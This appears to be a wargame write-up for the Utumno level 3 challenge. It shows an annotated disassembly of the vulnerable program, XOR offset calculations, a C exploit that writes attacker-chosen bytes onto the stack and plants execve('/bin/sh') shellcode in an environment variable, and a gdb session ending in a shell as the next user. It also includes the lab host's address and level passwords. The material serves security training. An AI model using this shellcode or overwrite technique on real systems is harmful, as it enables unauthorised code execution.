┌──────────────────────────────────────────────────────────┐esp+0x38 chr
│0x80483fd <main> push %ebp │esp+0x3c cnt
│0x80483fe <main+1> mov %esp,%ebp │esp+0x08 buf
│0x8048400 <main+3> push %ebx │
│0x8048401 <main+4> and $0xfffffff0,%esp │
│0x8048404 <main+7> sub $0x40,%esp │
│0x8048407 <main+10> movl $0x0,0x38(%esp) │
│0x804840f <main+18> mov 0x38(%esp),%eax │
│0x8048413 <main+22> mov %eax,0x3c(%esp) │
│0x8048417 <main+26> jmp 0x804846e <main+113> │
│0x8048419 <main+28> mov 0x38(%esp),%eax │
│0x804841d <main+32> lea 0x8(%esp),%ecx │
│0x8048421 <main+36> mov 0x3c(%esp),%edx │
│0x8048425 <main+40> add %ecx,%edx │
│0x8048427 <main+42> mov %al,(%edx) │buf[cnt] = chr
│0x8048429 <main+44> lea 0x8(%esp),%edx │
│0x804842d <main+48> mov 0x3c(%esp),%eax │
│0x8048431 <main+52> add %edx,%eax │
│0x8048433 <main+54> movzbl (%eax),%ecx │ecx = 0x00-00-00-chr
│0x8048436 <main+57> mov 0x3c(%esp),%eax │
│0x804843a <main+61> mov %eax,%edx │
│0x804843c <main+63> mov %edx,%eax │edx = eax = cnt
│0x804843e <main+65> add %eax,%eax │eax += eax
│0x8048440 <main+67> add %edx,%eax │eax += edx
│0x8048442 <main+69> xor %ecx,%eax │eax = (cnt * 3) ^ ecx
│0x8048444 <main+71> lea 0x8(%esp),%ecx │
│0x8048448 <main+75> mov 0x3c(%esp),%edx │
│0x804844c <main+79> add %ecx,%edx │
│0x804844e <main+81> mov %al,(%edx) │buf[cnt] = al
│0x8048450 <main+83> lea 0x8(%esp),%edx │
│0x8048454 <main+87> mov 0x3c(%esp),%eax │
│0x8048458 <main+91> add %edx,%eax │
│0x804845a <main+93> movzbl (%eax),%eax │eax = 0x00-00-00-buf[cnt]
│0x804845d <main+96> movsbl %al,%ebx │ebx = 0x??-??-??-buf[cnt]
│0x8048460 <main+99> call 0x80482d0 <getchar@plt> │
│0x8048465 <main+104> mov %al,0x20(%esp,%ebx,1) │[esp + ebx * 1 + 20h] = al
│0x8048469 <main+108> addl $0x1,0x3c(%esp) │
│0x804846e <main+113> call 0x80482d0 <getchar@plt> │
│0x8048473 <main+118> mov %eax,0x38(%esp) │chr = getchar();
│0x8048477 <main+122> cmpl $0xffffffff,0x38(%esp) │
│0x804847c <main+127> je 0x8048485 <main+136> │
│0x804847e <main+129> cmpl $0x17,0x3c(%esp) │
│0x8048483 <main+134> jle 0x8048419 <main+28> │
│0x8048485 <main+136> mov $0x0,%eax │
│0x804848a <main+141> mov -0x4(%ebp),%ebx │
│0x804848d <main+144> leave │
│0x804848e <main+145> ret │
└──────────────────────────────────────────────────────────┘
<========================================================>
MOVSBL and MOVZBL
* MOVSBL sign-extends a single byte, and copies it into a
double-word destination
* MOVZBL expands a single byte to 32 bits with 24 leading
zeros, and copies it into a double-word destination
Example:
%eax = 0x12345678
%edx = 0xAAAABBBB
MOVB %dh, %al %eax = 0x123456BB
MOVSBL %dh, %eax %eax = 0xFFFFFFBB
MOVZBL %dh, %eax %eax = 0x000000BB
<========================================================>
<========================================================>
cnt = 1, cnt * 3 = 3
0000-0011
(^)
0010-1111 => \x2f
(=)
0010-1100 = 0x2c ==> esp[20 + 2c]
cnt = 2, cnt * 3 = 6
0000-0110
(^)
0010-1011 => \x2b
(=)
0010-1101 = 0x2d ==> esp[20 + 2d]
cnt = 3, cnt * 3 = 9
0000-1001
(^)
0010-0111 => \x27
(=)
0010-1110 = 0x2e ==> esp[20 + 2e]
cnt = 4, cnt * 3 = 12
0000-1100
(^)
0010-0011 => \x23
(=)
0010-1111 = 0x2f ==> esp[20 + 2f]
cnt = 5, cnt * 3 = 15
0000-1111
(^)
0000-1111 => \x0f
(=)
0000-0000 = 0x00 ==> esp[20 + 00]
...
<========================================================>
root@today:~/Desktop/misc/utumno/utumno3# ssh utumno3@178.79.134.250
utumno3@178.79.134.250's password: zuudafiine
utumno3@melinda:~$ mkdir /tmp/utu3
utumno3@melinda:~$ cd /tmp/utu3
utumno3@melinda:/tmp/utu3$ cat hacker.c
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char buffer[2048] = {0};
int pfd[2] = {0};
pid_t pid;
if (pipe(pfd))
return 0;
pid = fork();
if (pid > 0){
close(pfd[0]);
write(pfd[1], "\x01\x55\x2f\xcf\x2b\xdf\x27\xff\x23\xff"
"\x0f\x55\x12\x55\x15\x55\x18\x55\x1b\x55"
"\x1e\x55\x21\x55\x24\x55\x27\x55\x2a\x55"
"\x2d\x55\x30\x55\x33\x55\x36\x55\x39\x55"
"\x3c\x55\x3f\x55\x42\x55\x45\x55\x48\x55", 50);
#if 1 /* when use gdb, turn 1 to 0 */
while (gets(buffer)) {
buffer[strlen(buffer) + 1] = '\0';
buffer[strlen(buffer)] = '\n';
write(pfd[1], buffer, strlen(buffer));
}
#endif
close(pfd[1]);
} else if (pid == 0) {
close(pfd[1]);
close(STDIN_FILENO);
dup2(pfd[0], STDIN_FILENO);
char *envp[] = {
"EGG=\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80",
NULL
};
execle("/utumno/utumno3", "/utumno/utumno3", NULL, envp);
close(pfd[0]);
}
return 0;
}
utumno3@melinda:/tmp/utu3$ gcc hacker.c -o hacker -g -m32
hacker.c: In function 'main':
hacker.c:29:17: warning: 'gets' is deprecated (declared at /usr/include/stdio.h:638) [-Wdeprecated-declarations]
while (gets(buffer)) {
^
./cco5rNKN.o: In function `main':
/tmp/utu3/hacker.c:29: warning: the `gets' function is dangerous and should not be used.
utumno3@melinda:/tmp/utu3$ gdb -tui hacker
(gdb) b *main
Breakpoint 1 at 0x80485bd: file hacker.c, line 8.
(gdb) run
Starting program: /tmp/utu3/hacker
Breakpoint 1, main (argc=1, argv=0xffffd624) at hacker.c:8
(gdb) set follow-fork-mode child
(gdb) c
Continuing.
[New process 20273]
process 20273 is executing new program: /games/utumno/utumno3
[Switching to process 20273]
Breakpoint 1, main (argc=1, argv=0xffffdee4) at utumno3.c:20
(gdb) layout asm
(gdb) x/10000dbc $esp
...
0xffffdfb4: 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 47 '/'
0xffffdfbc: 117 'u' 116 't' 117 'u' 109 'm' 110 'n' 111 'o' 47 '/' 117 'u'
0xffffdfc4: 116 't' 117 'u' 109 'm' 110 'n' 111 'o' 51 '3' 0 '\000' 69 'E'
0xffffdfcc: 71 'G' 71 'G' 61 '=' 106 'j' 11 '\v' 88 'X' 49 '1' -10 '\366'
0xffffdfd4: 86 'V' 104 'h' 47 '/' 47 '/' 115 's' 104 'h' 104 'h' 47 '/'
0xffffdfdc: 98 'b' 105 'i' 110 'n' -119 '\211' -29 '\343' 49 '1' -55 '\311' -119 '\211'
0xffffdfe4: -54 '\312' -51 '\315' -128 '\200' 0 '\000' 47 '/' 117 'u' 116 't' 117 'u'
0xffffdfec: 109 'm' 110 'n' 111 'o' 47 '/' 117 'u' 116 't' 117 'u' 109 'm'
0xffffdff4: 110 'n' 111 'o' 51 '3' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000'
0xffffdffc: 0 '\000' 0 '\000' 0 '\000' 0 '\000' Cannot access memory at address 0xffffe000
(gdb) x/8s 0xffffdfb4
0xffffdfb4: ""
0xffffdfb5: ""
0xffffdfb6: ""
0xffffdfb7: ""
0xffffdfb8: ""
0xffffdfb9: ""
0xffffdfba: ""
0xffffdfbb: "/utumno/utumno3"
0xffffdfcb: "EGG=j\vX1\366Vh//shh/bin\211\343\061\311\211\312\315\200"
0xffffdfe8: "/utumno/utumno3"
0xffffdff8: ""
(gdb) x/24dbx 0xffffdfcf
0xffffdfcf: 0x6a 0x0b 0x58 0x31 0xf6 0x56 0x68 0x2f
0xffffdfd7: 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e
0xffffdfdf: 0x89 0xe3 0x31 0xc9 0x89 0xca 0xcd 0x80
#so the shellcode is in the address of 0xffffdfcf
(gdb) b *main+113
(gdb) c (#24 times)
Breakpoint 2, main (argc=1, argv=0xffffdee4) at utumno3.c:27
(gdb) x/4dbx $esp+0x3c
0xffffde3c: 0x18 0x00 0x00 0x00
(gdb) x/8dbx $ebp
0xffffde48: 0x00 0x00 0x00 0x00 0xcf 0xdf 0xff 0xff
#we set the eip to our shellcode address#after main return, shellcode will be run
utumno3@melinda:/tmp/utu3$ ./hacker
whoami
utumno4
cat /etc/utumno_pass/utumno4
oogieleoga